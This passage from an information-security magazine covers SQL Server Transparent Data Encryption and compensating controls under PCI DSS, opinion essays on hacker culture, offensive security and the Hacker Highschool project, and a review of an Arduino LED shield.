There can be other approaches as well to contain SYN Floods. These can be:
• New Generation Firewall & Proxy Servers
• Recycling of the oldest Half Open TCBs
• Dynamic & adaptive threshold tuning and profiling
• Exception Recording, etc.
References
•
•
•
•
•
•
http://www.ietf.org/rfc/rfc4987.txt
http://linux.die.net/man/8/hping3
http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-4/syn_flooding_attacks.html
https://www.ietf.org/rfc/rfc2827.txt
http://www.ietf.org/rfc/rfc3704.txt
request_sock.c by Arnaldo Carvalho de Melo
About the Author
Ratan Jyoti is currently working as a Chief Manager (Information Security) at a leading
Indian Bank. He has more than 12 years experience in IT and Information Security in
Banking Industry. He is a Certified Information Systems Security Professional, Certified
Information Systems Auditor and a Certified Ethical hacker. His major areas of expertise
include Information Security Governance, Information Risk Management, IS Audit, Cyber
forensics, Information Security Management System and Compliance. He is a regular
contributor to reputed International Journals and Magazines in the area of Information
Security.
79
IMPLEMENTATION OF TRANSPARENT
DATA ENCRYPTION (TDE)
AND ADDITIONAL COMPENSATIONAL CONTROLS AS ALTERNATIVE
METHOD REGARDING ENCRYPTION OF PAN NUMBERS IN MICROSOFT
SQL DATABASE (PCI DSS V3.0, SECTION 3.4)
by Darko Mihajlovski, Kiril Buhov, Jani Nikolov
“Proper” TDE implementation should cover the 3.4 requirement from PCIDSS v3, where it
demands the following: Render PAN unreadable anywhere it is stored (including on portable
digital media, backup media, and in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography (hash must be of the entire PAN)
• Truncation (hashing cannot be used to replace the truncated segment of PAN)
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures
It has come to Visa’s attention that certain assessors and merchants require clarification about the intent
of 3.4 PCI DSS requirements. PCI Requirement 3.4 states: Render sensitive cardholder data unreadable
anywhere it is stored (including data on portable media, in logs and data received from or stored by wireless
networks) by using any of the following approaches:
• One-way hashes (hashed indexes) such as SHA -1
• Truncation
• Index tokens and PADs, with the PADs being securely stored
• Strong cryptography, such as Triple-DES 128-bit or AES 256-bit with associated key management
processes and procedures.
The MINIMUM account information that needs to be rendered unreadable is the payment card account
number.
The use of encryption to render cardholder data unreadable is a highly effective and readily accepted way
to secure data. For companies that are unable to employ sufficient encryption solutions due to technical
constraints, compensating controls may be considered. Only companies that have undertaken a risk analysis
and have legitimate technological or business constraints will be considered for use of compensating
controls to achieve compliance. Compensating controls must provide additional protection to mitigate any
additional risk posed by the unencrypted data. Compensating controls considered must be in addition to
controls required in the PCI DSS. It is not a compensating control to simply be in compliance with other PCI
requirements. Encryption, while a desirable approach, is not the only approach to meeting PCI 3.4.
The problem occurs when the System/Application/Software Vendor tells you that encrypting the PANs is not
a possible option.
80
PCI AND THE ART OF THE COMPENSATING
CONTROL
Compensating controls are a standard part of any security posture. But what makes an effective
compensating control?
In the early years of the Payment Card Industry Data Security Standard (PCI DSS), and even one author’s
experience under the CISP program, the term compensating control was used to describe everything from
a legitimate work-around for a security challenge to a shortcut to compliance. If you are considering a
compensating control, you must perform a risk analysis and have a legitimate technological or documented
business constraint before you even go to the next step. Companies being assessed will present more
documented business constraints for review based on the current economic situation.
Every compensating control must meet four criteria before it can be considered for validity. The four items
that every compensating control must do are: meet the intent and rigor of the original PCI DSS requirement,
provide a similar level of defense as the original PCI DSS requirement, be “above and beyond” other PCI
DSS requirements, and be commensurate with the additional risk imposed by not adhering to the PCI DSS
requirement.
An example of a valid control might be using extra logs for the su command in UNIX to track actions
executed under a shared root password. In rare cases, a system may not be able to use something like sudo
to prevent shared administrator passwords from being used. Keep in mind, this is not a license to use
shared passwords everywhere in your environment. Nearly every system has the ability to use something
like sudo, or “Run As” which is free or built into your OS, or a commercial variant if your platform
requires this.
WHERE ARE COMPENSATING CONTROLS IN PCI DSS?
Compensating controls are not specifically defined inside PCI, but are instead defined by you (as a self
certifying merchant) or your QSA. That’s where the trouble starts.
Thankfully, the PCI Council provides an example of a completed compensating control in Appendix C of the
PCI DSS, as well as a blank template to fill out. Appendix B provides all the guidance they feel necessary in
order to design a compensating control.
Compensating controls are ultimately accepted by acquirers or the card brands themselves (if applicable),
so even after putting all of this information together you could face the rejection of your control and a
significant amount of expense re-architecting your process to fit the original control. This is where an
experienced QSA can really help you ensure your control passes the “Sniff Test.” If it smells like a valid
control, it probably will pass. If you need examples, look later in this chapter under the section titled “Funny
Controls You Didn’t Design.”
WHAT A COMPENSATING CONTROL IS NOT
Compensating controls are not a short cut to compliance. In reality, most compensating controls are actually
harder to do and cost more money in the long run than actually fixing or addressing the original issue or
vulnerability.
Imagine walking into a meeting with a customer that has an open, flat network, with no encryption
anywhere to be found (including on their wireless network which is not segmented either). Keep in mind,
network segmentation is not required by PCI, but it does make compliance easier. Usually in this situation,
assessors may find a legacy system that cannot be patched or upgraded, but now becomes in scope. Then the
conversation about compensating controls starts. Now imagine someone in internal assessing telling you not
to worry because they would just get some compensating controls. Finally, imagine they tell you this in
the same voice and tone as if they were going down to the local drug store to pick up a case of compensating
controls on aisle five.
81
Compensating controls were never meant to be a permanent solution for a compliance gap. Encryption
requirements on large systems were made unreasonable early in this decade. Not only was there limited
availability of commercial off-the-shelf software, but it was prohibitively expensive to implement.
For Requirement 3.4 (Render PAN, at minimum, unreadable anywhere it is stored), card brands (largely
Visa at the time) were quick to point out that compensating controls could be implemented for this
requirement; one of those being strong access controls on large systems.
For mainframes, assessors would typically do a cursory walk through the controls and continue to
recommend an encryption solution at some point for those systems. At one point, compensating controls
were deemed to have a lifespan; meaning that the lack of encryption on a mainframe would only be
accepted for a certain period of time. After that, companies would need to put encryption strategies in place.
Compensating control life spans never materialized. Compensating controls can be used for nearly
every single requirement in the DSS--the most notable exception being permissible storage of sensitive
authentication data after authorization. There are many requirements that commonly show up on
compensating control worksheets; Requirement 3.4 being one of them.
To clarify: it is up to the QSA performing the assessment to decide to accept the control initially, but the
Acquiring Bank (for merchants) has the final say. Substantial documentation and an open channel of
communication to your acquirer is essential to ensure money is not wasted putting together controls that
ultimately do not pass muster.
Still, compensating controls are still a viable path to compliance even considering the above caveats and
descriptions of why you may not want to use them.
HOW TO CREATE GOOD COMPENSATING CONTROL
We’ve spent quite a bit of time setting this section up. We talked about what Compensating Controls
are, what they are not, and some of the best mis-guided attempts to create them. Before we discuss the
examples, please remember that these examples should be used for illustrative purposes only. I have over
simplified the scenarios for brevity, and things are rarely this simple in the corporate world. Ultimately,
compensating controls must be approved first by a QSA, or barring that, your Acquiring Bank. I know I
don’t like it when someone brings an article about PCI to an interview during an assessment, so please
don’t do that with this one. Now let’s walk through a couple of examples of how one might create a good
compensating control.
Here’s a common compensating control that QSAs will define and implement at a customer. A Level 1
brick and mortar retailer with 2,500 stores has some systems in their stores that do not process cardholder
data. These systems are a high risk to this customer’s cardholder environment because they may access both
the internet through a local firewall and the corporate intranet and webmail system, and users log-in to that
machine with the default administrator account. Store managers and retail operations claim that the systems
are required for day-to-day business because each store is empowered to customize their operations to better
fit the local market. The corporation believes this drives innovation and helps them maintain a competitive
edge over their peers.
If the retailer chooses not to segment the network, all of the systems in the store are now in scope, and they
must meet all of the applicable requirements of the PCI DSS. Doing this will add significant expense to the
IT infrastructure, and will probably force a call center to be staffed up in order to manage the volume of calls
that will come in for things like password maintenance.
What do you do? Do you crush the retailers’ aspirations to innovate by telling them they must deploy
active directory to these machines, lock them down Department of Defense tight, and staff a call center?
That is one option. But, if you made that recommendation you missed something important--understanding
the business and limiting the impact that your compliance recommendations make. Instead, consider this
compensating control.
Any number of network components could be used to create some segmentation in this environment.
Let’s say that we have a VLAN (Virtual Local Area Network) aware switch at the location that can have
82
access lists (ACLs) tied to it. Why not create a new VLAN for just the POS network? Then create some
ACLs around it to make it look like it is segmented behind a firewall. Now the threat of the in-store PC is
effectively mitigated provided that the ACLs are appropriately secure.
“But my store networks are different in every store,” you say. “I can’t just slap something in there like that
and expect it to work globally!” If this is the case, is your store support group overloaded with break-fix
calls? Maybe this could be an opportunity to shore this up and base each store’s network on a consistent
footprint?
APPROACH TO THE PROBLEM
SQL Server has advanced over the years to become a very popular, capable database, evolving from a
primarily departmental and SMB database to a fully enterprise capable platform. SQL Server’s appeals are
many, from its highly scalable and secure database engine to its built in reporting and data analysis tools.
SQL Server 2008 offers new features of particular interest to PCI DSS compliance including:
• Full Database Encryption through Transparent Data Encryption (TDE)
• Split Key Ownership through Extensible Key Management (EKM)
• Granular Auditing Capabilities through SQL Server Audit and Change Data Capture
• Continued support of Signed Module
• Built-in Control over Default SQL Server 2008 Features
• Stronger Control and Auditability overServer and Database Configuration through Policy-Based
Management
Implementation of the PCI DSS controls through SQL Server 2008 technology allows for the ability to
standardize and computerize security controls effectively and efficiently, particularly when applied during
the installation process.
SQL SERVER 2008 TRANSPARENT DATA
ENCRYPTION OFFERS FULL DATA ENCRYPTION
“Transparent data encryption(TDE) performs real-time I/O encryption and decryption of the data and log
files. The encryption uses a database encryption key (DEK), which is stored in the database boot record
for availability during recovery. The DEK is a symmetric key secured by using a certificate stored in
the master database of the server or an asymmetric key protected by an EKM module. TDE protects data
“at rest”, meaning the data and log files. It provides the ability to comply with many laws, regulations, and
guidelines established in various industries. This enables software developers to encrypt data by using AES
and 3DES encryption algorithms without changing existing applications.”
When choosing to enable TDE in your environment there are a number of factors to consider during the
implementation. First, TDE only secures data at rest and does not help to secure the communication (such as
during remote ODBC queries) of the data.
Second, the certificate used to encrypt the data is required during any attempt to decrypt the data. Third,
complete and accurate backups of the certificate are required to minimize the risk of data loss. Backups of
the database itself will be encrypted and will require the certificate as well.
83
USING MANUAL KEY MANAGEMENT
If you are using manual key management several steps will be required. You will need to create a database
master key in the master database (be sure to use a strong password to protect the key). The database
master key you have created will be used to protect the TDE certificate. You are now ready to backup the
master database master key to a removable disk and store in a safe location.
At this point, you are ready to create a certificate in the master database protected by the database master
key. Once again, remember to backup the certificate to a removable disk and store in a safe location.
Only users who need access to cardholder data should be given permissions to any keys and certificates
used to decrypt sensitive data.
As noted above, encryption keys may be managed manually or through an encryption key management
software package in SQL Server 2008.
In the case of SQL Server, the TDE Database Encryption Key must be replaced at least once per year.
You will need to generate or load a new certificate or asymmetric key, backup the certificate, and re-encrypt
the Database Encryption Key using the new certificate.
It is important to make sure to keep backups of prior certificates as those will be required to restore copies
of the database made when those certificates were active. Keep in mind this is also required when using
EKM generated asymmetric keys; however, the EKM provider should have features for managing this.
First, any user that can backup keys and certificates should have write access to the backup folder location,
but be denied read access to that location. Second, users with access to the key and certificate backup
folders should be denied access to any backups of the database. To make certain that this is the case,
the user who backs up the database should not be the same user who backs up the certificates.
At a high level, if an organization is using manual key management, the key must be stored utilizing tamper
evident media, or in a tamper evident container. In some instances something as simple as a pressure-sealed
envelope may suffice. The keys must also be placed under dual control. An example of dual control might
be a key file an organization has placed in “lockbox” inside of a safe. The key to the lockbox and key to the
safe would be given to separate individuals. Thus two people are required to act in concert to recover the
key. Lastly, any plaintext instances of cryptographic keys must be under split knowledge. Split knowledge
requires that no single individual has access to the entire plaintext key.
Using our “lockbox in a safe” example, split knowledge might require that the actual key is stored in two
“halves”, and potentially in separate lockboxes inside the safety deposit box. Looking at what this means
for SQL Server when using manual key management first create a database master key in the master
database. Be sure to use a strong password to protect the key, with parts of the password entered by two
individuals. The database master key you have created will be used to protect the TDE certificate. You are
now ready to backup the master database master key and/or the TDE certificate to a removable media. Be
certain to store it in a safe location, and employ secure storage mechanisms meeting the requirements of
tamper evident, dual knowledge, and split control referenced above. At this point, you are ready to create
a certificate in the master database protected by the database master key. Once again, remember to backup
the certificate to a removable media and store securely. When using manual key management, careful
consideration must be given to access to the data encrypting keys and key encrypting keys so that your
organization can achieve proper implementation of split knowledge. For example, it may be required to
have two individuals present to enter portions of the password assigned to the backup certificates. A similar
requirement may exist for access to service accounts which can access the keys. Remember to carefully
consider which users or service accounts that have sufficient access to the database bootfile, as that will
be the “key to the kingdom”.
Also, it should be mentioned that in the environment it should be fulfilled the following:
• SA disabled when using Windows auth. Mode
• BUILTIN/Administrators group not a member of sysadmin role
84
• Use of signed modules
• Role based access
• Hard segregation of duties, with matrixes of segregations, evidences and etc.
• Hardening of the Database configuration, as reference - Compliance with the Microsoft SQL 2008 Server
Hardening Guide, Version 1.0.0, 19 May 2011
References
[1]Elaine Barker, William Barker, William Burr, William Polk, and Miles Smid, NIST Special Publication 800-57,
Recommendation for Key Management – Part 1: General (Revision 3), (2012)
[2]K. Brian Kelley, Kevvie Fowler, Nancy Hidy-Wilson, CIS Microsoft SQL Server 2012 Database Engine Benchmark
v1.0.0, Release Date: Mon Jan 6 12:10:34 2014
[3idera, SQL Server Whitepapper, Security and Compliance Solutions for Payment Card Industry (PCI) Data
Security Standard (DSS),
[4]https://msdn.microsoft.com/en-us/library/bb934049.aspx
[5]http://msdn.microsoft.com/en-us/library/ms190730%28v=SQL.100%29.aspx
About the Authors
Darko Mihajlovski
MSc EE, C|EH, Certified Lead ISO27001:2013 Auditor.
Has been working as a Chief Information Security Officer in a large company for the past six years and
is also involved in information security projects, intended primarily for improving IS management in other
companies, as an Information Security Professional. He is an ISMS expert in the field of implementing
ISO27001:2005, PCI DSS 2.0, experienced in Auditing Information Systems, Incident Management,
Analyze Audit Trail; and Penetration Testing. Head of Information Security Department, Halkbank AD
Skopje, [email protected].
Kiril Buhov
MSc PM.
Head of Information Systems and Technical Support Department, Halkbank AD
Skopje, [email protected].
Jani Nikolov
MSc.B.
Head of Card Processing and Alternative Channels Department, Halkbank AD Skopje,
[email protected].
85
Hacking Journalists
by Bob Monroe
There was a time when a reporter was called a hack. This term referred to their ability to
hack away on a typewriter to create a story on a short deadline. Somewhere in the 1950’s,
MIT’s Railroad Club adopted the term when they saw a cool use of technology. Railroads
help to build the world and spread commerce across the globe. This was a proud term, a
name for an action that you could be pleased to have been associated with. Then, somewhere
that hack name started to be used for criminal internet activity. Today, a hacker is someone
to be put in jail just for being called that nasty name.
Security vendors use slogans like “Stop Hackers in their Tracks” and “Fight Hackers Where They Attack”.
Okay, maybe these are termite pest control slogans but the meaning is the same: hackers are bad people,
according to the press. The problem is that hackers aren’t bad people. Bad people are bad people. There
is a huge difference between a hacker and a criminal. Some hacks actually save lives.
Here is a nice hack for you: There is a microcontroller board called the TouchBoard made by Bare
Conductive. I bought two of them when Radio Shack starting selling off their inventory around here.
Each board cost me $10. Basically the board is a sensor controller. The device has twelve touch sensors that
connect to a processor and the operating system is stored on a microSD card. When powered up with head
phones or speakers attached, if you touch one of the sensors, a song is played from the storage card.
You can change out the songs just by renaming and copying your songs over the ones on the tiny media card.
If you press one sensor you get some jazz music. You touch another and you get some Frank Sinatra. A third
sensor plays a symphony. You get the idea. Twelve sensors, twelve outputs. But with this board, there are
two other output modes on the circuits.
How can we hack this?
Let’s say you live in a home where you’ve installed this $10 board to act as a sensor controller. When you
step into your home, an IR detector senses your presence and activates the first touch sensor. This sensor
is wired to your air conditioning unit. It is preset to turn onto 22 degree Celsius when activated.
Walking in the front door activates this first environmental device.
The second sensor is already activated because it is wired to a light sensor outside your house. It just detects
whether it is light or dark outside. Since you work long hours, you often come home late to a dark house.
Since this sensor is already activated, when you walk in the front door, that switch is tripped and lights turn
on to illuminate your hallway.
So we have two sensors working now. Let’s look at the third sensor on the twelve sensor device.
This third sensor is wired to your media player. You like to come home to some music. When you enter
your front door the third sensor is activated and your media player is already programmed to play some nice
heavy metal or Danish folk songs, your choice. Right there we’ve turned a $10 MP3 player into a home
automation platform, or a smarthome as the media would call it.
Now, let’s take this same hack to another level – that’s what hackers do, we try new things with existing
technology.
Around where I live, we have a problem with cars running red lights. As a hacker, I never want to see
anyone hurt so I want to come up with an easy solution to stop this reckless problem. I install the same
$10 TouchBoard in the traffic light management system located near the sidewalk. Next, we set up an
inexpensive IR beam by the traffic light that shines down at an angle onto the pavement below. A beam like
this would cost around $3 at Radio Shack. Next to the beam we install a Passive Infrared Detector (PID)
which also costs a whole $11 at Radio Shack.
86
The IR beam hits the pavement and is reflected back to the PID. IR is great at detecting heat and motion,
like an on/off switch but with precision. Next, we set up a small algorithm that can determine the speed of
an approaching vehicle. When a vehicle enters the beam field as the traffic light begins to turn from green
to yellow, a calculation is made to determine the speed of that approaching traffic. We can easily figure out
whether that incoming car will be able to stop in time to meet the coming red light.
If that vehicle is moving too fast to safety brake for the red light, it’s simple human nature that the driver
will run the red light. We have the statistics to back those numbers up. When that speeding traffic is sensed
and determined that it will not be able to safety stop at that red light, then the first TouchBoard sensor is
activated. This activation tells the traffic control box to turn all traffic lights red and keep them all red for
three to four seconds. We don’t want any other traffic to move into the intersection so all lights remain red.
As the red-light runner enters the middle of the intersection, there is another IR and PID sensor attached to
a camera that takes a lovely picture of the license plate, with the red glow of the light. That nice picture is
sent via email to the local traffic enforcement agency who will send that driver a wonderful letter in the mail
along with a fine. That is the second sensor on the TouchBoard being activated.
On the far end of the intersection, there is a third set of IR and PID sensors. These determine that the
offending vehicle has left the danger area of the intersection. This trips the third TouchBoard sensor which
plays some jazz music and tells the traffic management system to reset the system and return to normal
operations.
With a simple $10 TouchBoard, we’ve played some music, automated your house and saved a couple
of lives. All by just doing some simple hacks. Please, the next time you are persuaded to think of hackers
as criminals, remember that even hackers like Danish Folks songs. Or something like that.
Hack and don’t talk smack.
About the Author
Bob Monroe grew up in Southern California before he joined the U.S. Army in 1985. One of Bob’s first
military assignments introduced him to the world of hacking. His prankster ways ended abruptly in 1996
when he was almost caught hacking by an eighty-two year old librarian. This incident led to a renewed
interest in cyber security, as a good guy. Since then, he has written several articles for publication and
maintains a passion for digital security. Bob holds a Master of Science in Information Assurance from
Norwich University. Bob’s specialty is cyber teaching and security awareness training. Along with work
for the U.S. Army, he has taught security classes for the Veterans Administration, Military District of
Washington, Commandant of the Marine Corp and staff, as well as countless others across the world. He
holds a U.S. Patent for airport security automation technology that combines radar and thermal imaging
to protect aircraft movement areas and the surrounding airspace. This patent does not impress the TSA
folks at all and usually gives them a reason to strip search him instead. Bob works with the Institute for
Security and Open Methodologies (ISECOM.org) and Hacker High School as an editor and writer. Both
organizations are non-profit, with the mission of teaching computer security methods across a global
audience. In his spare time, Bob makes children’s toys in his small woodshop. He still has all nine fingers,
too. Oops, make that seven fingers.
87
Offended by Offensive Security
by Bob Monroe
The commonly held belief in the realm of digital security (cyber security for the new folks
and media) is that the methods employed are strictly defensive in nature. Networks prepare
for and wait for an attack, defend against the attack, respond as needed and maybe even
report the attack to the authorities. If the attack was successful and not detected, the
authorities contact the network in a reverse fashion. This process repeats itself thousands
of times a day across the world.
Rates of actual convictions for computer crimes range from 89%1 for small countries to 5% for larger ones2.
This does not reflect the actual number of people accused of committing such crimes, only the total number
of people charged for such crimes that are convicted in a court.
IMB’s Xforce Threat Activity Exchange3 shows current malicious activity across all monitored and reported
IP addresses across the globe. At any given moment, there are hundreds of attacks represented on the
exchange in a lovely colored chart of the world. There is nothing new to this information, just a different
way to express it.
Defensive posturing is the art of fortifying assets with multiple types of protection. In the physical world,
there are walls, barbed wire, security guards with vicious attack dogs, doors, walled doors with vicious
attack dogs and so forth. The digital world has firewalls, intrusion detection systems, packet sniffers, access
controls, and authentication methods, but sadly no vicious attack dogs. Networks combine these physical
and digital products in a constant game of trying to protect their assets.
We already know how well that is working out for them. Target, Sony, Coca Cola, Starbucks and all the
banks out there have been in the headlines for being attacked.
Law enforcement expects organizations and people to perform due diligence on protecting their assets.
Leaving your valuable jewelry out in the open in public will be frowned upon by the police detective who
has to write that theft report. Likewise, not changing the default password on a network switch or VMware
server will also cause dismay from the shareholders as they pay out law suits for loss of data.
Due diligence is much like the cave people huddled around a fire during the dark of night. They expect the
fire (law enforcement) to protect them from the vicious attack of carnivores as they circle around the flames.
As the evening wears on, the flames must be stoked and maintained, which means somebody has to go get
more firewood. Those who go to get that firewood may not come back because they’ve ended up a meal for
something else.
This means the fire is limited in scope and resources. Law enforcement can only do so much with what they
have. As the animals see the fire wane, they approach closer and begin picking off one cave person at a time.
If one of the animals catches fire, the cave people at least get a buffet for their efforts. This is little comfort
since each night this same routine repeats itself. The fire is only a single tool and cannot be expected to
protect everyone against all hungry animals out there. We must look at another method.
Offensive security has had a bad reputation for many years. It is considered vigilantism by some. Others will
say that you are taking the law into your own hands. There are political and legal issues with reprisal against
the wrong parties, if you counter attack. The arguments are endless, yet nothing really seems to change the
cyber security environment except more high profile attacks. Argue all you want, changes only happen when
someone is willing to make those changes.
Paul Asadoorian and John Strand offered a solution at the 2012 RSA convention4. Their approach was
to suggest three phases of annoyance, attribution and attack to ward off malicious intruders. Using the
same tools as penetration testers use, these could be employed to become offensive weapons, the presenters
acknowledged. They also suggested tagging data and documents with web bugs to activate whenever that
88
asset was used outside the intended environment. This is similar to the ink bombs used on department store
merchandise that explode if the garment leaves the perimeter.
This is also very much like the ink packets used in banks that stain money stolen during a heist.
Is that offensive security or just good advice? Both.
There has never been a battle in the history of war won by waiting for the enemy to attack first. If you
happen to wait for the enemy, then it is called an ambush and you have the upper hand due to the element
of surprise and firepower. No military commander has ever told their troops to sit and wait for the enemy to
strike first. There is no tactical advantage to such a strategy but security professionals are expected to do this
exact same thing each and every day. We wait and then respond. We add more kindling to the fire, hoping we
don’t get eaten next.
It’s a little like watching a horror movie. You know that the victim shouldn’t go down into the basement
alone but they do anyways. Doesn’t the sound of a chain saw and screams give the victim the slightest hint
that bad things are happening in the basement? But there they go, armed with a faulty flashlight and no cell
phone signal, to their doom, over and over again.
Forgive the bluntness but this is stupid. Defensive security is no way to go through life. We tell our kids not
to be victims of bullies, we tell them to stand up to school thugs. We don’t practice what we preach, though.
Even police departments in the U.S. have paid ransoms to get their data back from ransomware thieves. The
fire itself has gotten burned.
At what point are you going to stop playing the game where you don’t even know the rules? Penetration
testing is not the same as an attack. A penetration test has a scope with limitations and boundaries. An
attack has a goal and no time limit. In order to conduct a proper security test, you must use the Open Source
Security Testing Methodology Manual (OSSTMM). If you want to prove trust in your network, you have to
have a scientific and mathematically proven method instead of just some cool software.
Stop waiting for the bad man to go away. He isn’t going to leave. Start conducting proper security testing
and become active in your role as a security professional. Grab the OSSTMM and start pursuing the animals
eating all your friends. That fire is not getting any bigger.
1 http://saitnews.co.za/e-government/cybercrime-conviction/
2http://www.oneindia.com/feature/conviction-rate-cyber-crime-is-0-5-per-cent-here-are-the-reasons-1609728.html
3 https://exchange.xforce.ibmcloud.com/
4http://whatis.techtarget.com/definition/offensive-security
About the Author
89
Shouting at the Security Waves
by Bob Monroe
At the RSA convention in April, I met a wonderful European gentleman named Knud. The ‘K’
is pronounced for this name. Knud told me the story of a Viking king who was known for
shouting at the waves. According to several documented accounts, this king would make it
his mission to order the waves to cease at his command. The Viking lord was spotted many
times standing on top of a cliff yelling at the waves below to stop. For what purpose, we
will never know. We do know that the waves did not stop and have not stopped for any man
beyond religious accounts.
No mortal man has ever been able to command the ocean to bend to their will. But that would be a cool trick
to witness.
The biggest question here is why a noble man would even try to stop these forces of nature. Because
he thought he could? Because he thought he had some magical power? Because he was trying to prove
a point, maybe?
In digital security, we often find ourselves trying to shout at the waves as well. We go to training, attend classes,
buy new software, add all sorts of cool gadgets, in hopes that we, too, can control the waves of security woes.
This is not just an uphill battle; it’s a battle you can’t win with the way things are going now.
No, this article isn’t about FUD. It’s about the reality of futility. RSA had an estimated 35,000 attendees last
week. Of those thousands, I only saw a few African Americans. I saw a small percentage of women make up
the crowd. Except in one case, I did not see a single teenager. Why is that?
The last time I looked, there was a significant part of our population that isn’t white and male. So why
is digital security dominated by old white guys when the real world doesn’t look anything like that? Amit
Yoran of RSA had a talk about the need for a new map in the field of cyber security. How about we start
by populating that map with a better representation of the real world? We can add some minorities to the
workforce. We can increase the amount for women in this profession. Maybe even give them equal pay
for equal work.
While Mr. Yoran has you sitting in the dark1 when it comes to security, we at the Institute for Security and
Open Methodology have created a free teaching platform for teens. If we want a new shift in thinking, if we
want the waves to actually stop, we need to come up with a new solution. At Hacker Highschool2, we have
a new solution and it’s called free education. There are all kinds of lessons for teens to download that will
teach them about the digital security profession. These lessons are free to download and are translated into
twenty-two languages.
The lessons do not teach any particular product or vendor, we teach our students to think for themselves.
The lessons do not endorse sitting in the dark, waiting for an opportunity. Instead we teach something called
trust. Trust is established by implementing the ten operational security controls listed in the Open Source
Security Testing Methodology Manual (OSSTMM). This is an unbiased evaluation of any device, network,
or product down to the chip level.
You, the evaluator, get to determine whether something is trustworthy or not. The vendor marketing terms
and fancy words fall to the side when you use the free OSSTMM. This is what we are teaching at Hacker
Highschool. We are teaching the next generation of digital security professionals to question every firewall,
every protocol, every chip on every device and every means of communication to see if they are trustworthy.
The OSSTMM uses a simple mathematical formula to remove any doubt that could add opinion over fact.
1 http://www.rsaconference.com/blogs/rsas-amit-yoran-security-is-stumbling-around-in-the-dark?utm_source=inhouse&utm_medium=email&utm_campaign=
april2015newsletter&spMailingID=22563241&spUserID=MTA3NDg3MTA1NjQ4S0&spJobID=543048202&spReportId=NTQzMDQ4MjAyS0
2
Hackerhighschool.org
90
Our lessons at Hacker Highschool are being taught at a rate of 6 million downloads. Of those downloads,
only 2% are from the U.S... Why is that? Why is it that China understands the importance of teaching their
youth about security but the U.S. does not? Europe and Asia also understand this critical shortfall but not
in America. We don’t ask for your race, gender or financial background to download our free material.
We just want you to learn.
Hacker Highschool has the lessons, the teacher training material and the certifications backed by the Institute
for Security and Open Methodology (ISECOM.org).
We want you to stop shouting at the waves and shine some light into the darkness. The new map belongs
to our future and we need to start teaching them about the mistakes we already made. For those who are
asking who I am, I’m an unpaid volunteer for Hacker Highschool, as all of us are. We believe in this cause
but we need your help. Help us to help you. Teach the next generation of teens about our field. Shine some
light onto their faces and watch them learn.
A little knowledge goes a long way.
About the Author
91
RGB LED Lighting Shield with XMC1202
for Arduino
Reviewed by Bob Monroe
This little board is powered by a Cortex Arm M10 processor, which means it has
programmable functions but sips power. Don’t confuse the M10 with Intel’s M core
processors even though this processor runs on 32 bit at 32 MHz. This isn’t lightning fast,
however, this board isn’t designed as a graphics card. It’s designed to be a programmable
LED controller. To program the board and run it, you have to have an Arduino board or you
can use Infineon’s own XMC1100 Boot Kit.
The XMC1100 is native to the XMC1202, so they sit on top of each other. This is pretty much what
all microcomputers do, they allow for boards to stack on top of each other, connected via GPIO, serial
or other direct methods. There is speed in doing this since the boards are physically attached and share
input and output. Since the XMC1202 has its own programmable processor, that processor can add to the
microcomputer’s own computation power, almost like a GPU would.
This frees up the main processor to focus on other tasks instead of having to compute graphics data. Think of
it as having your own personal assistant. That assistant can pick up duties you don’t have time for. so it frees
you up to do other things, like play with other add on boards and write cool code.
The board is screaming red in color. It almost hurts your eyes to look at. Infineon and a few other companies
have been doing this flaming color thing for one reason or another. I guess it helps you find the board if you
ever misplace it. I’m talking ultra-bright red. The type of red that usually signals danger. Luckily, the board
isn’t a danger, just really bright.
I noticed quite a bit of empty space on the board; what I would consider to be wasted space because I like
my boards to be packed with every sensor and gadget available. The XMC1202 does one thing but it does it
well. It controls LEDs. This means you have an assortment of options with a programmable LED board. You
are a little limited on the pin count, though, so make your connections count.
If you are interested in controlling all of the lighting in your home or small office, this board is for you. If
you want to set up a cool LED display that says what a great programmer are, this is the board for you. The
XMC1202 can control up to three different LED channels at a time. This means you can configure a string of
red LEDs to flash, while a strand of blue LEDs pulse and your green LEDs orbit in a loop. There, you have a
nice Halloween costume or a funky outfit for your dog.
I was a little surprised by the heat put off by the board during my testing. The buildup isn’t terrible but it
would be something to take into consideration if your poor dog were wearing an outfit using this dev board.
The LEDs don’t really put off any heat but they did make my dog look at me really funny when they started
to flash. He tried to bite them. It was funny to see his mouth light up as the LEDs pulsed.
The XMC1202 has some of the pin outs marked so you know what they do. It also helps that the red monster
has connector holes to stack onto the other boards. There is about a ½ clearance that you will need to take
into consideration where the wires are connected. I found this additional space useful to help move some of
that excess heat away from the main board. The space uses plastic parts so you don’t need to worry about
making extra sparks if the two boards touch. I’ve seen other addon boards that seem to have forgotten that
electricity likes to move through metal parts. It’s always fun to see some sparks but never from your own
device or your dog.
The XMC doesn’t have any switches for power or reset. This isn’t a big problem since you can program
which conditions turn on the board and which ones shut it down. Remember that the LEDs will need their
own power source. The board says it can provide the power at 5Vs but unless you plug in a power supply
running at 1.5 Amps, get your own power for the LEDs. It’s just easier that way. Unless you want to add on
some capacitors, charge- zap, charge- zap. You get the idea.
92
I did run into another small problem, I don’t have tiny hands. I know these are microcomputers. I know they
are supposed to be small but do they really have to make connectors that small? I had to use a magnifying
glass just to insert the wire leads. A big magnifying glass and a big flashlight, even though the board puts off
its own light with the red color.
Luckily, the manufacturer understands that some of us have normal sized hands. For that, they made the
wire connections with nice plastic screw tighteners. These little screws keep the LED wires from slipping
out of the connector that I spent years (not really, a more like few seconds) trying to get in place. They hold
the LEDs very secure, considering that they are plastic. I was surprised at how well the connections held the
wires, especially since I’m not the most careful person I know. You don’t even want to know what my lab
looks like. Imagine Tokyo after Godzilla ate a ton of bean burritos. That’s how bad my lab is organized, so
stuff gets tangled up all the time.
The Infineon RGB shield was able to survive my lab, my hands, my dog and my endless curiosity. This is a
cool add on board for Arduino projects. One thing I wanted to really hack was not using LEDs but hooking
up other low power devices and using the board’s signaling capabilities. If I can pulse, blink, and orbit LED
lights, what is keeping me from using the same technique to control an IR light or radio signal for a mini
radar device? Nothing, just your imagination. That is the best part of hacking, you build whatever you want.
About the Author
93
Security in Computing by Charles
P. Pfleeger, Shari Lawrence Pfleeger
ad Jonathan Mrgulies
Reviewed by Bob Monroe
I read and review about 30 books a year on average, plus spend most of my days researching
and writing about digital security. I’ve been doing this routine since 1989 so I have a so-so
understanding of cyber security. Security in Computing took me by surprise since it looked
like the average security 101 book I read way too often. This book is nothing like any security
book I’ve read before except a few dissertation pieces I’ve picked up.
